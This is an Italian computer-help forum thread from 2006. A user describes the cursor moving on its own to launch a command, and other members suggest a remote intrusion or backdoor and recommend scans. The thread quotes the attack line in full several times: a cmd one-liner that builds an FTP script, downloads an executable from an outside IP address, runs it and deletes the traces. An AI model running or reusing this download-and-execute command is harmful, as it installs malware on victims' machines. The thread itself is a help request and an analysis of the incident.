Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > Aiuto sono infetto! Cosa faccio?

Tastiera gaming MSI GK600 TKL: switch hot-swap, display LCD e tre modalità wireless
Tastiera gaming MSI GK600 TKL: switch hot-swap, display LCD e tre modalità wireless
MSI FORGE GK600 TKL WIRELESS: switch lineari hot-swap, tripla connettività, display LCD e 5 strati di fonoassorbimento. Ottima in gaming, a 79,99 euro
DJI Osmo Pocket 4: la gimbal camera tascabile cresce e ha nuovi controlli fisici
DJI Osmo Pocket 4: la gimbal camera tascabile cresce e ha nuovi controlli fisici
DJI porta un importante aggiornamento alla sua linea di gimbal camera tascabili con Osmo Pocket 4: sensore CMOS da 1 pollice rinnovato, gamma dinamica a 14 stop, profilo colore D-Log a 10 bit, slow motion a 4K/240fps e 107 GB di archiviazione integrata. Un prodotto pensato per i creator avanzati, ma che convince anche per l'uso quotidiano
Sony INZONE H6 Air: il primo headset open-back di Sony per giocatori
Sony INZONE H6 Air: il primo headset open-back di Sony per giocatori
Il primo headset open-back della linea INZONE arriva a 200 euro con driver derivati dalle cuffie da studio MDR-MV1 e un peso record di soli 199 grammi
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 14-11-2006, 15:57   #1
mibfb
Member
 
Iscritto dal: Feb 2003
Messaggi: 49
[help] effetto a cui non so dare spiegazione

salve, oggi pomeriggio ero tranquillamente davanti al computer quando mi e' successo un fatto inspiegabile. a un certo punto il mouse mi e' aprtito ha aperto lo start e la voce "esegui" inserendo e lanciando questa frase:

cmd /c echo OPEN 151.37.183.77 18488>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit


ora aprimo sguardo penso che sia stato qualcuno che e' entrato nel mio pc e ha tentato di cancellare norton. ditemi la vostra e nel caso quali precauzioni prendere e sopratutto cosa questo comando ha fatto al mio pc.

grazie
mibfb è offline   Rispondi citando il messaggio o parte di esso
Old 14-11-2006, 17:01   #2
GmG
Senior Member
 
L'Avatar di GmG
 
Iscritto dal: Aug 2006
Città: Riviera del Brenta
Messaggi: 2058
Quote:
Originariamente inviato da mibfb
salve, oggi pomeriggio ero tranquillamente davanti al computer quando mi e' successo un fatto inspiegabile. a un certo punto il mouse mi e' aprtito ha aperto lo start e la voce "esegui" inserendo e lanciando questa frase:

cmd /c echo OPEN 151.37.183.77 18488>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit


ora aprimo sguardo penso che sia stato qualcuno che e' entrato nel mio pc e ha tentato di cancellare norton. ditemi la vostra e nel caso quali precauzioni prendere e sopratutto cosa questo comando ha fatto al mio pc.

grazie

Non è qualcuno che ti è entrato nel pc ma hai qualcosa nel pc che ha usato dei comandi da prompt per scaricare con FTP il file 84785_norton.exe e poi eseguirlo.
GmG è offline   Rispondi citando il messaggio o parte di esso
Old 14-11-2006, 20:06   #3
mibfb
Member
 
Iscritto dal: Feb 2003
Messaggi: 49
si ma il norton questa cosa me la dovrebbe trovare giusto? e poi come e' avvenuto il fatto mi ha fatto proprio pensare a un attacco visto cheho visto partire il mouse andare su start aprire l'esegui e incollare quella stringa e lanciare.
mibfb è offline   Rispondi citando il messaggio o parte di esso
Old 15-11-2006, 18:15   #4
blackbit
Senior Member
 
Iscritto dal: Aug 2006
Città: Reggio Calabria
Messaggi: 1774
più ke comando remoto sembra proprio desktop remoto! xkè il mouse da solo non si muove.

stacci attento, proteggiti a dovere ke internet non è un giardinetto
blackbit è offline   Rispondi citando il messaggio o parte di esso
Old 16-11-2006, 21:41   #5
bReAkDoWn
Senior Member
 
L'Avatar di bReAkDoWn
 
Iscritto dal: Jun 2003
Città: ..By The Sea..
Messaggi: 564
Quote:
Originariamente inviato da mibfb
salve, oggi pomeriggio ero tranquillamente davanti al computer quando mi e' successo un fatto inspiegabile. a un certo punto il mouse mi e' aprtito ha aperto lo start e la voce "esegui" inserendo e lanciando questa frase:

cmd /c echo OPEN 151.37.183.77 18488>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit


ora aprimo sguardo penso che sia stato qualcuno che e' entrato nel mio pc e ha tentato di cancellare norton. ditemi la vostra e nel caso quali precauzioni prendere e sopratutto cosa questo comando ha fatto al mio pc.

grazie
Avevi mica attivo un server winvnc? Altrimenti potresti avere una backdoor che permette a un utente remoto di eseguire operazioni sul tuo pc. Fai in ogni caso qualche scansione online.

Come giustamente ti hanno detto, qualcuno o qualcosa ha scaricato ed eseguito quel file sul tuo pc, ma quello che è strano è il modo in cui è stato eseguito il comando. Fosse stato un trojan o cmq un programma in esecuzione sul tuo pc, avrebbe scelto la strada più difficile e allo stesso tempo plateale per eseguire quella operazione. Infatti un programma avrebbe potuto tranquillamente scaricare ed eseguire il file senza che tu ti accorgessi di niente, e anche a livello di codice sarebbe stato molto più semplice che far spostare il mouse, eseguire un click ecc. Inoltre considerando l'indirizzo a cui ti hanno fatto accedere, l'ipotesi di intervento manuale si rafforza.
Esso infatti corrisponde ad adsl-77-183.37-151.net24.it: una adsl di libero. Probabilmente questo qualcuno ha aperto un server ftp sul suo pc e l'ha utilizzato temporaneamente per far arrivare quel file sul tuo computer lanciando una sessione ftp.
Infine, se vuoi sapere cosa abbia fatto quel file, l'unica cosa che puoi fare è provare a cercarlo nel tuo pc. Esegui anche tu cmd, poi esegui dir e guarda se il file c'è ancora. Se non lo trovi lì prova a cercarlo in tutte le cartelle con la funzione trova file o cartelle di windows.
__________________
Without Contraries is no Progression...
bReAkDoWn è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Tastiera gaming MSI GK600 TKL: switch hot-swap, display LCD e tre modalità wireless Tastiera gaming MSI GK600 TKL: switch hot-swap, ...
DJI Osmo Pocket 4: la gimbal camera tascabile cresce e ha nuovi controlli fisici DJI Osmo Pocket 4: la gimbal camera tascabile cr...
Sony INZONE H6 Air: il primo headset open-back di Sony per giocatori Sony INZONE H6 Air: il primo headset open-back d...
Nutanix cambia pelle: dall’iperconvergenza alla piattaforma full stack per cloud ibrido e IA Nutanix cambia pelle: dall’iperconvergenza alla ...
Recensione Xiaomi Pad 8 Pro: potenza bruta e HyperOS 3 per sfidare la fascia alta Recensione Xiaomi Pad 8 Pro: potenza bruta e Hyp...
I nuovi Surface Pro e Laptop sono vicini...
OnePlus ci riprova con la fascia bassa: ...
La Top 10 delle offerte Amazon del weeke...
XGIMI MoGo 2 Pro a 339€: Google TV con N...
Forum IT & Intelligence 2026: dall'A...
iPhone 16e per la prima volta a meno di ...
Stop Killing Games: Ross Scott convince ...
Annunciata la tuta di volo di Vast che s...
Vast presenta il nuovo Large Docking Ada...
Una denuncia getta ombre sulle batterie ...
DJI Avata 2 Fly Smart Combo a 526€: il d...
Alla guida della nuova auto elettrica ci...
GeForce RTX 3060 12 GB a giugno di nuovo...
Apple Music sarà sponsor ufficiale di Po...
The Mandalorian & Grogu: trailer fin...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 09:30.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v